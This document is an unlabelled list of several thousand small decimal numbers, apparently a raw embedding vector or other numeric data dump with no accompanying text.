0.012095966376364231, -0.014396661892533302, 0.006159555166959763, 0.01705131120979786, -0.05758664757013321, 0.008556433953344822, -0.0003443349269218743, -0.029547398909926414, 0.045244455337524414, -0.0020121471025049686, -0.04247438535094261, 0.020806293934583664, -0.02773146517574787, -0.031132493168115616, -0.001877490896731615, -0.03373327851295471, -0.011064885184168816, -0.019559761509299278, 0.0028316257521510124, -0.03890407457947731, -0.03071698360145092, 0.035703107714653015, 0.033363938331604004, 0.008733410388231277, -0.02249911241233349, -0.029101109132170677, 0.04247438535094261, 0.010995633900165558, -0.013265551067888737, -0.0262233167886734, 0.00959520973265171, -0.03321004658937454, 0.04364397004246712, 0.003756905673071742, -0.021391086280345917, -0.026531102135777473, 0.04302839934825897, -0.03588777780532837, -0.013796480372548103, 0.023622529581189156, -0.03758059814572334, -0.03330238163471222, 0.034471966326236725, -0.007636925205588341, -0.02730056457221508, 0.007971641607582569, -0.0037896076682955027, -0.02896260656416416, -0.01466597430408001, -0.000013803754882246722, 0.021883541718125343, 0.023037737235426903, 0.004401331301778555, -0.0018024682067334652, 0.015473910607397556, -0.025423074141144753, -0.016912808641791344, -0.0445057675242424, -0.04376708343625069, 0.02586936391890049, 0.014188907109200954, -0.04121246561408043, -0.004016599617898464, -0.0034395018592476845, 0.0020929407328367233, 0.03699580579996109, 0.022560669109225273, -0.004551376681774855, -0.013934983871877193, 0.04284372925758362, -0.011087968945503235, 0.03591855615377426, -0.0054824273101985455, -0.050969261676073074, 0.01408887654542923, -0.005351618863642216, -0.02034461498260498, -0.031086325645446777, -0.018297841772437096, -0.0057132663205266, 0.015735529363155365, -0.03493364155292511, 0.012573033571243286, 0.012942376546561718, 0.00866415910422802, 0.010064582340419292, 0.024530496448278427, 0.035272207111120224, -0.020837072283029556, -0.014996843412518501, -0.021560367196798325, -0.032563693821430206, 0.01685125008225441, -0.02697739005088806, 0.042535942047834396, -0.0015302705578505993, -0.03644179180264473, -0.0532468743622303, 0.015112263150513172, -0.03107093647122383, -0.00559399975463748, 0.010780183598399162, 0.0075522842817008495, 0.038565509021282196, 0.019452037289738655, -0.040750786662101746, -0.03128638491034508, -0.0015379651449620724, -0.01355025265365839, -0.0035703107714653015, -0.041981928050518036, -0.016112565994262695, -0.003039380768314004, -0.03182500973343849, -0.028762545436620712, -0.0007973565370775759, -0.019098084419965744, -0.002408420667052269, 0.025484630838036537, -0.014173517934978008, -0.04179725795984268, -0.019452037289738655, 0.0030201443005353212, 0.015835558995604515, 0.017189813777804375, 0.006890545599162579, -0.04533679038286209, -0.02249911241233349, -0.007032896392047405, -0.007775428704917431, 0.049738120287656784, -0.016112565994262695, 0.03484130650758743, 0.023868758231401443, 0.006363463122397661, 0.01888263411819935, -0.029070330783724785, 0.019575150683522224, 0.0037299743853509426, -0.009210478514432907, 0.007136773783713579, -0.012411446310579777, 0.03222513198852539, 0.006132624112069607, 0.0013792633544653654, -0.04912254959344864, 0.04148947075009346, 0.02714667282998562, -0.0532468743622303, 0.0152969341725111, -0.003012449713423848, -0.0034548910334706306, -0.0035376085434108973, -0.013642587698996067, -0.031378719955682755, -0.015912504866719246, -0.005505511537194252, -0.020914018154144287, 0.030024465173482895, -0.03791915997862816, -0.018651794642210007, 0.030501533299684525, 0.028270089998841286, 0.019528983160853386, 0.011734317988157272, -0.012157523073256016, 0.04598313942551613, -0.020883239805698395, -0.01337327528744936, 0.0071867890655994415, 0.006224959623068571, 0.010718626901507378, -0.019005749374628067, 0.018590237945318222, 0.035272207111120224, -0.020129164680838585, -0.01609717682003975, 0.013457916676998138, 0.03754981979727745, -0.019251976162195206, -0.0017851553857326508, -0.017713049426674843, -0.05176950618624687, -0.02094479650259018, 0.0053169927559792995, 0.0036145548801869154, -0.015504689887166023, 0.009572125971317291, -0.026561880484223366, -0.03807305544614792, 0.022483723238110542, -0.01712825708091259, 0.043059177696704865, 0.014165823347866535, 0.028624042868614197, -0.02336091175675392, -0.0005823876708745956, -0.05838689208030701, 0.03170189633965492, 0.03345627337694168, 0.025530798360705376, 0.017066700384020805, -0.005059222690761089, -0.012057493440806866, -0.002533458638936281, -0.042812950909137726, -0.011949768289923668, -0.01792849972844124, -0.014296632260084152, -0.012519171461462975, -0.004432109650224447, 0.023468635976314545, -0.019682876765727997, -0.0026238705031573772, -0.046352483332157135, -0.023099293932318687, 0.002668114611878991, 0.007413780782371759, -0.0036241731140762568, 0.009841438382863998, -0.04065845161676407, 0.01652807556092739, -0.01478139404207468, -0.039242640137672424, 0.04259749874472618, -0.015066095627844334, -0.00012107027578167617, 0.019605930894613266, -0.05432412400841713, -0.014373578131198883, -0.03028608299791813, 0.0012965459609404206, -0.017851553857326508, 0.016066398471593857, -0.023668697103857994, -0.012249859049916267, -0.014704447239637375, -0.02880871295928955, -0.011934379115700722, -0.06017204746603966, 0.03838083893060684, 0.02034461498260498, -0.05269286036491394, -0.010087666101753712, -0.006925171706825495, -0.005486274603754282, 0.004816841334104538, 0.015612414106726646, -0.01755915768444538, 0.012750010006129742, -0.025484630838036537, 0.010480092838406563, -0.08310205489397049, -0.02272995188832283, -0.007348376326262951, 0.011826653964817524, -0.011118747293949127, -0.026885055005550385, -0.020883239805698395, -0.011572730727493763, -0.041581809520721436, 0.02106790989637375, -0.016204901039600372, -0.006017204374074936, 0.05300064757466316, 0.002412268193438649, 0.020837072283029556, 0.0008343869703821838, 0.021668091416358948, 0.038042277097702026, 0.007267582695931196, 0.012988544069230556, -0.0022583752870559692, -0.01337327528744936, -0.04749128594994545, 0.022822286933660507, -0.0026719619054347277, -0.00046937272418290377, -0.018821077421307564, -0.00655582919716835, 0.013719534501433372, -0.007367613259702921, 0.008894997648894787, -0.0006275936611928046, -0.01267306413501501, -0.028839491307735443, -0.004178186878561974, -0.0049438029527664185, 0.011018717661499977, -0.011826653964817524, -0.029116498306393623, -0.03234824538230896, 0.0010839817114174366, -0.004612933844327927, 0.010872519575059414, -0.021237192675471306, 0.010618596337735653, -0.041951149702072144, -0.008079366758465767, 0.02086785063147545, -0.03477974981069565, 0.019544372335076332, 0.010818656533956528, 0.00931820273399353, 0.003801149781793356, -0.007736955303698778, -0.04582924768328667, -0.0155970249325037, 0.010426230728626251, 0.006228806916624308, -0.038719404488801956, -0.020298447459936142, 0.035149093717336655, 0.014696752652525902, 0.0162972379475832, 0.022283663973212242, -0.010549345053732395, -0.003252906957641244, -0.02670038305222988, 0.02320702001452446, 0.0036222494672983885, -0.030301472172141075, 0.0063442266546189785, 0.018020834773778915, -0.009718324057757854, -0.0012138286838307977, -0.0022391388192772865, -0.0025950155686587095, 0.01564319245517254, 0.03918108344078064, 0.0027508321218192577, 0.009641377255320549, 0.008279426954686642, -0.029255002737045288, -0.004682185593992472, -0.03948886692523956, -0.00792547408491373, 0.007871611975133419, -0.02773146517574787, -0.07965486496686935, 0.027839189395308495, -0.010649374686181545, -0.005828686058521271, 0.01140344887971878, 0.023422468453645706, 0.041704922914505005, -0.05755586922168732, -0.02380720153450966, 0.004485972225666046, 0.03807305544614792, 0.03071698360145092, -0.02240677736699581, 0.016666579991579056, -0.05272363871335983, -0.019344313070178032, 0.008125534281134605, 0.05654017999768257, -0.004020446911454201, 0.027916135266423225, 0.008556433953344822, -0.04136635735630989, -0.016620412468910217, 0.024422772228717804, -0.02988596260547638, -0.032563693821430206, -0.03551843389868736, 0.0024295810144394636, -0.012796178460121155, 0.020837072283029556, -0.060387495905160904, -0.02154497802257538, 0.017574546858668327, -0.005921021569520235, -0.025930920615792274, -0.008956555277109146, 0.02232983149588108, -0.02471516840159893, 0.0013581031234934926, 0.005036138463765383, -0.02408420853316784, -0.0186825729906559, 0.004559071268886328, -0.013965762220323086, 0.01851329207420349, -0.03739592805504799, 0.01501992717385292, 0.012080577202141285, -0.02885488048195839, 0.030055245384573936, -0.00850257184356451, -0.01297315489500761, -0.017420653253793716, 0.03441040962934494, -0.033394716680049896, -0.01939048059284687, 0.0023353216238319874, -0.0068405307829380035, 0.005163100082427263, -0.04025832936167717, -0.006059525068849325, 0.0010224246652796865, -0.001680315937846899, -0.017651492729783058, 0.019021138548851013, -0.020606232807040215, 0.013911900110542774, 0.0818709135055542, 0.032409802079200745, 0.03742670640349388, 0.014127349480986595, -0.05647861957550049, -0.008487182669341564, 0.03905796632170677, -0.010818656533956528, 0.00003438540079514496, 0.06063372269272804, -0.015266155824065208, 0.03167111799120903, 0.030470754951238632, 0.009772186167538166, -0.007163705304265022, 0.026438765227794647, -0.0006679904763586819, -0.019729044288396835, -0.008394846692681313, -0.024068817496299744, -0.00048235742724500597, 0.025977088138461113, -0.005363160744309425, 0.010995633900165558, -0.05638628453016281, -0.014712141826748848, -0.02790074609220028, 0.016420351341366768, -0.0015908657805994153, 0.011388059705495834, 0.005393939092755318, -0.009687545709311962, -0.03844239562749863, 0.008048588410019875, 0.03151722624897957, -0.005413175560534, 0.01521998830139637, 0.004274369683116674, 0.005043833050876856, 0.02770068682730198, -0.015281544998288155, 0.01019539125263691, -0.007702329661697149, -0.014173517934978008, 0.027793021872639656, 0.02089862897992134, 0.025576967746019363, -0.011972852051258087, -0.0353645421564579, -0.005820991471409798, -0.0033452424686402082, -0.04228971526026726, -0.024699779227375984, -0.029701290652155876, -0.031855788081884384, 0.02439199388027191, 0.005113084800541401, -0.02936272695660591, 0.019682876765727997, 0.008079366758465767, -0.010403146967291832, -0.04244360700249672, 0.007971641607582569, -0.01160351000726223, 0.020406171679496765, -0.003970431629568338, -0.0038126916624605656, -0.0007483032532036304, -0.004643712192773819, -0.03157878294587135, 0.014396661892533302, 0.029039552435278893, 0.02308390475809574, 0.022314442321658134, 0.0010608978336676955, -0.013727229088544846, -0.0194674264639616, 0.0076753986068069935, 0.005470885429531336, -0.03385639563202858, -0.06389624625444412, 0.02353019453585148, -0.014796783216297626, -0.007282971870154142, -0.012334499508142471, -0.010618596337735653, -0.007209872826933861, 0.026054034009575844, -0.0276237390935421, 0.018328620120882988, -0.020775513723492622, 0.020990964025259018, 0.0027719922363758087, -0.02416115440428257, -0.00025055656442418694, 0.00627882219851017, -0.02686966583132744, -0.02229905314743519, -0.0069867284037172794, 0.013311718590557575, -0.0009733713231980801, -0.007048285566270351, 0.008125534281134605, -0.024930616840720177, 0.001908269478008151, 0.01652807556092739, -0.008187091909348965, -0.009941468015313148, 0.02933194860816002, 0.019128862768411636, 0.007963947020471096, -0.03302537277340889, 0.04604469612240791, 0.055370595306158066, -0.026177149266004562, -0.020298447459936142, -0.011103358119726181, 0.029147276654839516, 0.00726373540237546, 0.0057363505475223064, 0.0022449097596108913, -0.011295724660158157, 0.0016697357641533017, 0.0480760782957077, 0.03237902373075485, 0.014019625261425972, -0.025423074141144753, 0.016697358340024948, 0.002412268193438649, -0.019005749374628067, -0.02189893089234829, 0.0006449065986089408, -0.04505978152155876, 0.0353645421564579, 0.007059827446937561, 0.029778238385915756, 0.03702658414840698, -0.0017659186851233244, -0.0012523018522188067, 0.00362032582052052, 0.008987333625555038, -0.0032644488383084536, -0.031455669552087784, -0.0014542860444635153, -0.03998132422566414, -0.03905796632170677, 0.04964578524231911, 0.042105041444301605, -0.009833743795752525, -0.01283465139567852, -0.0022160548251122236, -0.013473305851221085, -0.025146067142486572, 0.007760039530694485, 0.031409502029418945, -0.018528681248426437, -0.019328923895955086, 0.009718324057757854, 0.01395037304610014, -0.005243893712759018, 0.01775921694934368, -0.020406171679496765, -0.005578610580414534, -0.029224224388599396, 0.02825469896197319, 0.04352085664868355, -0.01297315489500761, 0.0029835947789251804, 0.005817144177854061, -0.026592658832669258, 0.02420732192695141, -0.03157878294587135, 0.005209268070757389, -0.007586909923702478, -0.013611809350550175, -0.0044667357578873634, -0.006421172991394997, -0.010464703664183617, -0.03942731022834778, 0.02185276336967945, 0.04044300317764282, 0.028300868347287178, -0.009541347622871399, 0.029501231387257576, 0.005905632395297289, 0.001467751688323915, 0.0055632209405303, -0.006605844013392925, 0.006879003718495369, -0.013327107764780521, -0.0007232956704683602, 0.0341641791164875, -0.0134117491543293, 0.004270522389560938, -0.010495482012629509, -0.004716811235994101, 0.016035620123147964, -0.018451735377311707, 0.0017534149810671806, -0.028393203392624855, -0.0111264418810606, 0.030855486169457436, -0.03277914598584175, -0.016312627121806145, 0.026838887482881546, 0.0004556666826829314, 0.008194786496460438, -0.019051916897296906, 0.0028066181112080812, -0.00945670623332262, 0.012165217660367489, -0.05066147819161415, 0.021883541718125343, -0.007863917388021946, -0.006332684773951769, -0.02134491689503193, 0.004089698661118746, 0.00014343280054163188, -0.018697964027523994, -0.006409631110727787, 0.02240677736699581, -0.010564734227955341, -0.023037737235426903, -0.015566246584057808, 0.018328620120882988, -0.018544070422649384, -0.01991371624171734, 0.027285175397992134, 0.011780486442148685, 0.009233562275767326, -0.010380062274634838, -0.01466597430408001, -0.010495482012629509, -0.031301774084568024, 0.015373880974948406, 0.012026714161038399, -0.017620714381337166, -0.00545549625530839, -0.010287727229297161, -0.019175030291080475, 0.02288384549319744, 0.005063069984316826, 0.013773396611213684, 0.007129079196602106, 0.00460908655077219, -0.018190117552876472, -0.002941274316981435, 0.013773396611213684, 0.006228806916624308, 0.007836985401809216, -0.014896813780069351, 0.011172610335052013, 0.011757402680814266, -0.02690044417977333, 0.002616175916045904, 0.020436950027942657, 0.009387454949319363, -0.014081181958317757, 0.02745445817708969, -0.004655254073441029, -0.019221197813749313, 0.009718324057757854, 0.012303721159696579, 0.008317900821566582, -0.035149093717336655, 0.0010974473552778363, -0.0011234167031943798, 0.05173872783780098, -0.019528983160853386, 0.018667183816432953, 0.00880266260355711, -0.04078156501054764, -0.013727229088544846, -0.005894090514630079, 0.008871913887560368, 0.04188959300518036, 0.035703107714653015, 0.019929105415940285, 0.0019246205920353532, 0.017636103555560112, -0.014235074631869793, 0.0248382817953825, 0.027531404048204422, -0.01436588354408741, -0.009449011646211147, 0.019082695245742798, -0.017974667251110077, -0.0006569294491782784, -0.031978901475667953, -0.02232983149588108, 0.010180002078413963, 0.020575454458594322, -0.033517830073833466, -0.045521460473537445, 0.0011503479909151793, 0.011880516074597836, -0.0274236798286438, -0.01692819781601429, -0.0011984393931925297, -0.006894392892718315, -0.03453352302312851, 0.027869967743754387, -0.012357584200799465, 0.04749128594994545, -0.007459948770701885, 0.05075381323695183, -0.03465663641691208, 0.039119523018598557, 0.03084009699523449, -0.05429334565997124, -0.026007866486907005, 0.022976180538535118, -0.010764794424176216, -0.0004434033471625298, -0.010026109404861927, 0.005424717906862497, -0.0018582543125376105, -0.033517830073833466, -0.012826956808567047, -0.029116498306393623, 0.021668091416358948, 0.024822892621159554, 0.001771689741872251, -0.014273547567427158, 0.0051438636146485806, 0.0034414255060255527, -0.028747156262397766, 0.01047239825129509, -0.01434279978275299, 0.043182291090488434, 0.01963670924305916, -0.04247438535094261, -0.010803267359733582, 0.021637313067913055, -0.00668663764372468, 0.0013619504170492291, -0.024053428322076797, 0.01337327528744936, 0.022437555715441704, 0.012180606834590435, -0.004124324303120375, 0.0174822099506855, 0.007702329661697149, 0.008694937452673912, -0.02614636905491352, 0.002546924166381359, 0.028700988739728928, 0.014473608694970608, 0.014458219520747662, 0.012434530071914196, 0.05118471384048462, -0.009410538710653782, -0.02185276336967945, -0.023468635976314545, -0.003125945571810007, 0.002485367003828287, -0.022745341062545776, -0.036811135709285736, 0.02893182821571827, -0.010995633900165558, 0.007548436988145113, 0.029455063864588737, 0.02232983149588108, 0.02229905314743519, 0.020806293934583664, 0.002046772977337241, -0.029778238385915756, -0.02499217540025711, 0.002350711030885577, -0.014188907109200954, -0.007987030781805515, 0.029824405908584595, -0.02606942318379879, -0.029393505305051804, -0.024699779227375984, -0.011095663532614708, -0.02880871295928955, 0.009071975015103817, -0.022222105413675308, -0.00874110497534275, -0.016343405470252037, -0.015504689887166023, 0.0007786008645780385, 0.01283465139567852, -0.03345627337694168, 0.016989754512906075, -0.0017841934459283948, -0.0162972379475832, -0.031732674688100815, 0.011172610335052013, 0.026654215529561043, -0.04124324396252632, -0.008925776928663254, -0.02757757157087326, -0.020883239805698395, 0.0036587989889085293, -0.044967446476221085, -0.0005049604224041104, -0.015404659323394299, 0.002608481328934431, -0.0013590649468824267, 0.0034067996311932802, 0.039119523018598557, -0.004628323018550873, -0.023914925754070282, 0.025407684966921806, 0.006321142893284559, 0.0054901218973100185, -0.04299762099981308, -0.023376300930976868, 0.00008157515549100935, -0.023268576711416245, -0.007979336194694042, 0.006802057381719351, 0.007306056097149849, 0.0007641734555363655, 0.024946006014943123, 0.005270825233310461, 0.02963973395526409, 0.021052520722150803, -0.005182336550205946, 0.0303938090801239, -0.020513897761702538, -0.000016366127965738997, -0.005451648961752653, -0.020667789503932, 0.019282754510641098, -0.025130677968263626, 0.01871335320174694, 0.006959797348827124, 0.021114079281687737, -0.02928578108549118, -0.01241914089769125, -0.010426230728626251, -0.004916871897876263, 0.004132018890231848, -0.005528595298528671, -0.023468635976314545, 0.00443980423733592, 0.00850257184356451, 0.01255764439702034, 0.009048891253769398, -0.01160351000726223, 0.03687269240617752, -0.01146500650793314, -0.010564734227955341, -0.017974667251110077, -0.004501361399888992, 0.027408290654420853, -0.025407684966921806, -0.04549068212509155, -0.015743223950266838, 0.011034106835722923, 0.012180606834590435, -0.04515211656689644, 0.002531534992158413, 0.0024353519547730684, -0.0365649051964283, -0.028947217389941216, 0.014319716021418571, 0.0012455690884962678, 0.04813763499259949, 0.01160351000726223, -0.04749128594994545, -0.0034029523376375437, -0.011095663532614708, 0.0142042962834239, -0.021514199674129486, -0.01783616468310356, 0.027239007875323296, 0.014488997869193554, -0.02646954543888569, 0.04447498917579651, -0.0276237390935421, -0.009887605905532837, 0.0010964855318889022, 0.011734317988157272, -0.04613703116774559, -0.013719534501433372, -0.022914623841643333, 0.012488393113017082, 0.010949465446174145, 0.017913110554218292, -0.0028470149263739586, 0.019621320068836212, -0.01009536162018776, 0.04875320941209793, 0.0010676305973902345, -0.008348679170012474, -0.01068784762173891, -0.015512384474277496, -0.012588422745466232, -0.012926986441016197, -0.004636017605662346, 0.0019736739341169596, 0.03210201859474182, -0.008887303061783314, 0.017235983163118362, 0.010480092838406563, -0.0008685319335199893, 0.009933773428201675, 0.0030297625344246626, -0.008279426954686642, 0.021683482453227043, -0.02606942318379879, -0.0010810962412506342, -0.012573033571243286, 0.03191734477877617, 0.003641485935077071, -0.03927341848611832, -0.0008108221809379756, -0.03176345303654671, -0.016743525862693787, 0.013165520504117012, -0.016543464735150337, 0.007302208803594112, 0.017943888902664185, -0.02940889447927475, 0.03887329623103142, -0.034748971462249756, 0.002850862219929695, 0.01545852143317461, -0.004574460443109274, 0.020637011155486107, 0.006682790350168943, 0.005401633679866791, 0.006702027283608913, 0.010633985511958599, -0.017589936032891273, -0.0027200535405427217, 0.027716076001524925, -0.023868758231401443, 0.01677430421113968, -0.009802965447306633, -0.006890545599162579, 0.0008002420654520392, 0.007740803062915802, -0.03490286320447922, -0.010341589339077473, 0.0027181298937648535, 0.011057190597057343, 0.026130979880690575, -0.03317926451563835, 0.01535849180072546, -0.008394846692681313, -0.00989530049264431, -0.028439370915293694, -0.012596117332577705, -0.04038144648075104, -0.022222105413675308, 0.017235983163118362, 0.017543768510222435, -0.012934681959450245, -0.019251976162195206, 0.02260683849453926, 0.004805299453437328, 0.017589936032891273, -0.0022391388192772865, -0.03091704286634922, 0.007879306562244892, 0.008117839694023132, 0.025653913617134094, 0.012680758722126484, 0.03191734477877617, -0.019605930894613266, -0.005459343548864126, -0.0048322309739887714, -0.021083300933241844, -0.025299960747361183, 0.02293001301586628, 0.011418838053941727, 0.011595815420150757, -0.0401352159678936, 0.006305753253400326, -0.0034856696147471666, -0.013619503937661648, -0.00028927018865942955, 0.005632472690194845, 0.000007739720786048565, -0.0023545583244413137, 0.006236501503735781, 0.00237379502505064, 0.01883646659553051, 0.007956252433359623, 0.009549042209982872, 0.003499135375022888, -0.02011377550661564, 0.004316690377891064, -0.0031740369740873575, -0.006294211372733116, -0.023222409188747406, -0.016558853909373283, -0.01986754685640335, 0.014358188956975937, -0.003352937288582325, -0.0325944758951664, 0.005140016321092844, 0.0003864149621222168, 0.012750010006129742, -0.00559399975463748, -0.03711891919374466, -0.02817775309085846, -0.015512384474277496, -0.02368408627808094, -0.022914623841643333, 0.016789693385362625, -0.02920883521437645, 0.010218475013971329, 0.05543215200304985, -0.016512686386704445, -0.025253791362047195, -0.009579820558428764, 0.016035620123147964, -0.00910275336354971, 0.0006891507655382156, -0.021483421325683594, -0.025700081139802933, -0.017713049426674843, 0.009333591908216476, 0.0025796263944357634, -0.0007502268999814987, 0.02062162198126316, -0.01072632148861885, -0.008633380755782127, 0.02534612827003002, -0.010156918317079544, 0.028793323785066605, -0.002333397977054119, -0.02491522766649723, 0.0018130483804270625, -0.006224959623068571, -0.01680508255958557, 0.020283058285713196, -0.010187696665525436, 0.01168045587837696, 0.0006194181041792035, 0.018867244943976402, -0.0029028011485934258, -0.021083300933241844, -0.01552007906138897, 0.00874110497534275, 0.00023745163343846798, -0.004155103117227554, 0.00418203417211771, 0.021483421325683594, -0.024853670969605446, 0.004366705194115639, 0.0142042962834239, 0.000247190153459087, 0.004847620148211718, -0.007752344943583012, -0.023514805361628532, 0.012026714161038399, -0.021206414327025414, 0.027439069002866745, 0.015758613124489784, -0.0037049667444080114, -0.006390394177287817, 0.02439199388027191, -0.013557947240769863, 0.008687242865562439, 0.0011772791622206569, -0.0006651050061918795, 0.031886566430330276, 0.005070764571428299, 0.013973456807434559, -0.008048588410019875, 0.003912721760571003, 0.005767128895968199, -0.0142042962834239, -0.013119352981448174, 0.005459343548864126, 0.004120477009564638, 0.006248043850064278, -0.018344009295105934, -0.00019501089991535991, -0.0031220982782542706, 0.032409802079200745, -0.00806397758424282, 0.029070330783724785, 0.0054401070810854435, -0.0047706738114356995, 0.018051613122224808, 0.01505840104073286, 0.023868758231401443, -0.014650585129857063, 0.010264643467962742, 0.007348376326262951, 0.029116498306393623, 0.022945402190089226, -0.02069856785237789, 0.01031081099063158, 0.006305753253400326, 0.0031047852244228125, -0.021406475454568863, -0.012226775288581848, -0.015804780647158623, -0.01357333641499281, -0.0024353519547730684, 0.0018515215488150716, 0.051646389067173004, 0.0061710975132882595, -0.004347468726336956, 0.00004595741120283492, 0.02229905314743519, 0.005940258037298918, -0.019652098417282104, -0.016635801643133163, -0.008171702735126019, -0.013165520504117012, 0.016758915036916733, -0.01186512690037489, 0.003214433789253235, -0.008102450519800186, -0.0009286462445743382, 0.015089179389178753, 0.020760124549269676, 0.0033721737563610077, -0.01705131120979786, -0.022237494587898254, 0.009995331056416035, -0.026454154402017593, 0.0008468907908536494, 0.017636103555560112, 0.015404659323394299, 0.012357584200799465, 0.005605541635304689, -0.0031586477998644114, -0.001481217215768993, -0.0008718983153812587, 0.014104265719652176, -0.02451510727405548, 0.003162495093420148, 0.017436042428016663, 0.0017322547500953078, -0.008171702735126019, 0.0172821506857872, 0.007271429989486933, 0.02579241618514061, -0.004624475724995136, -0.003056693822145462, -0.016081787645816803, 0.014035014435648918, -0.024853670969605446, 0.046352483332157135, -0.028901049867272377, -0.017913110554218292, 0.001793811796233058, -0.01697436533868313, 0.027131283655762672, 0.029516620561480522, 0.021514199674129486, 0.007879306562244892, -0.006321142893284559, -0.004920719191431999, -0.022422166541218758, -0.007286819163709879, 0.008394846692681313, -0.014412051066756248, 0.00008163526945281774, 0.007229109760373831, 0.003891561646014452, 0.019282754510641098, 0.017389874905347824, 0.016666579991579056, -0.023514805361628532, 0.006032594013959169, -0.005151558201760054, 0.0009594248258508742, 0.005901785101741552, 0.0007338758441619575, -0.003499135375022888, 0.018974969163537025, 0.018405567854642868, 0.025130677968263626, -0.02805463969707489, -0.02670038305222988, -0.03244058042764664, 0.01685125008225441, -0.020360004156827927, -0.023668697103857994, -0.0056132362224161625, 0.010333894751966, 0.014442830346524715, -0.008456404320895672, -0.003025915240868926, 0.0017130181659013033, -0.01612795516848564, -0.021745039150118828, 0.014742921106517315, -0.022591449320316315, 0.0024969091173261404, -0.01225755363702774, -0.02197587676346302, -0.007813901640474796, -0.0006578912725672126, -0.003154800273478031, -0.00025728935725055635, 0.004974581766873598, 0.04065845161676407, -0.005232351832091808, -0.0311940498650074, -0.00006299982487689704, 0.007579215336591005, -0.0019044221844524145, -0.0007747535710223019, 0.005351618863642216, -0.02476133592426777, 0.009033501148223877, 0.014235074631869793, -0.016004841774702072, 0.028039250522851944, -0.013103963807225227, -0.038011498749256134, -0.013865732587873936, -0.038011498749256134, 0.02551540918648243, 0.012611506506800652, -0.003714584978297353, 0.01640496216714382, 0.002464206889271736, 0.009649072773754597, 0.017866943031549454, 0.027331342920660973, -0.010541650466620922, -0.0264233760535717, 0.007232957053929567, -0.004289758857339621, 0.014081181958317757, 0.009887605905532837, 0.000547280942555517, 0.040473781526088715, 0.010141529142856598, 0.002333397977054119, 0.004712963942438364, -0.011649677529931068, -0.004651406779885292, 0.015689359977841377, -0.019682876765727997, -0.017266761511564255, -0.030132191255688667, -0.011495784856379032, -0.003039380768314004, 0.008687242865562439, 0.00047105594421736896, 0.006809751968830824, 0.006271127611398697, -0.019929105415940285, 0.020175332203507423, -0.004005057737231255, -0.014142739586532116, 0.02745445817708969, 0.01605100929737091, -0.0002883083652704954, 0.009902995079755783, 0.027069726958870888, -0.00585176981985569, 0.007386849727481604, 0.0024276573676615953, 0.011349586769938469, 0.014827561564743519, 0.0031682660337537527, 0.0013205917784944177, 0.01562010869383812, -0.005697877146303654, -0.0027335190679877996, 0.018067002296447754, -0.01851329207420349, -0.001907307654619217, -0.030132191255688667, -0.011934379115700722, 0.01348869502544403, -0.02594630979001522, 0.0025815500412136316, -0.004378247540444136, -0.015073790214955807, -0.012819262221455574, 0.012911597266793251, -0.0178823322057724, 0.008933471515774727, -0.020206112414598465, -0.018590237945318222, -0.016897419467568398, -0.01017230749130249, 0.009572125971317291, -0.020129164680838585, -0.015650887042284012, 0.0026123286224901676, 0.006186486687511206, 0.049615006893873215, -0.00801011547446251, -0.013758007436990738, -0.006936713587492704, 0.0014081181725487113, 0.006174944806843996, -0.01524307206273079, 0.00989530049264431, 0.008040893822908401, -0.026915833353996277, 0.020360004156827927, -0.007733108010143042, -0.007394544314593077, -0.01792849972844124, 0.014450524933636189, 0.0024661305360496044, 0.012103660963475704, 0.013088574633002281, 0.010510871186852455, -0.022037435322999954, 0.031886566430330276, 0.05924868956208229, 0.03441040962934494, -0.021868152543902397, 0.03585699945688248, -0.00286048068664968, -0.004720658529549837, 0.0037799894344061613, -0.020713957026600838, -0.0069521027617156506, -0.013304024003446102, 0.004005057737231255, -0.028624042868614197, -0.004512903280556202, -0.010126139968633652, 0.008594906888902187, 0.019775211811065674, -0.017297539860010147, -0.009010417386889458, 0.023468635976314545, 0.0011128366459161043, -0.0021602688357234, 0.0036241731140762568, -0.0242381002753973, -0.015343102626502514, -0.01843634620308876, 0.007444559596478939, -0.01891341246664524, -0.006228806916624308, 0.0011147602926939726, 0.023776423186063766, 0.011580425314605236, 0.004851467441767454, 0.035826221108436584, 0.0033702501095831394, 0.029116498306393623, 0.010834045708179474, -0.020606232807040215, -0.010803267359733582, -0.005213115364313126, 0.02229905314743519, -0.011057190597057343, 0.01999066211283207, -0.0013427138328552246, -0.01184204313904047, 0.00935667660087347, 0.024622831493616104, -0.006482730153948069, -0.011103358119726181, 0.021960487589240074, -0.0009868369670584798, -0.021160246804356575, 0.004959192126989365, -0.015881726518273354, 0.01943664811551571, 0.019575150683522224, 0.015350797213613987, 0.0041089351288974285, 0.026331041008234024, 0.002006376162171364, -0.0009897224372252822, -0.007513811346143484, -0.03247135877609253, 0.003335624234750867, 0.023853369057178497, 0.007429169956594706, 0.02471516840159893, 0.021160246804356575, 0.01368875615298748, 0.030547700822353363, 0.0013100116048008204, 0.004982276353985071, -0.0035453031305223703, 0.01732831820845604, -0.011972852051258087, 0.030686205253005028, 0.013257856480777264, 0.022068213671445847, 0.031978901475667953, -0.0049514975398778915, -0.012480697594583035, 0.014812172390520573, -0.017097478732466698, -0.010064582340419292, 0.0035145245492458344, 0.007259888108819723, -0.008810357190668583, -0.0076753986068069935, -0.0194674264639616, 0.02690044417977333, 0.006201875861734152, 0.0086410753428936, 0.002514221938326955, -0.01685125008225441, 0.005090001039206982, -0.010557039640843868, 0.021160246804356575, -0.019498204812407494, 0.004312843084335327, 0.013396359980106354, 0.006571218371391296, -0.004278216976672411, 0.015258461236953735, 0.03342549502849579, 0.005270825233310461, -0.014881424605846405, -0.005313145462423563, 0.022283663973212242, -0.006144165992736816, 0.01335019152611494, 0.03287148103117943, -0.0001235950767295435, -0.01077248901128769, -0.009810660034418106, -0.00584022793918848, 0.028762545436620712, -0.03641101345419884, -0.009133531711995602, -0.01999066211283207, 0.017420653253793716, -0.025823194533586502, -0.013665671460330486, -0.02790074609220028, 0.014273547567427158, -0.006590454839169979, 0.00668663764372468, -0.0010128063149750233, -0.03477974981069565, -0.013288634829223156, -0.02106790989637375, 0.01712825708091259, 0.00866415910422802, -0.0027777631767094135, -0.015512384474277496, 0.0047783683985471725, -0.02439199388027191, -0.0006261509261094034, -0.022068213671445847, 0.008548739366233349, 0.009772186167538166, -0.011372670531272888, 0.004382094833999872, -0.003924263641238213, -0.023637918755412102, -0.012965460307896137, -0.024468939751386642, -0.004736047703772783, -0.015658581629395485, -0.00022254326904658228, 0.025084510445594788, -0.00724065164104104, -0.008841135539114475, -0.0035145245492458344, 0.013965762220323086, 0.005486274603754282, 0.00529390899464488, -0.0011570807546377182, -0.021267971023917198, -0.005420870613306761, -0.0012513400288298726, -0.011011023074388504, -0.0009070051019079983, 0.0043513160198926926, 0.029039552435278893, 0.0024661305360496044, -0.0022930011618882418, 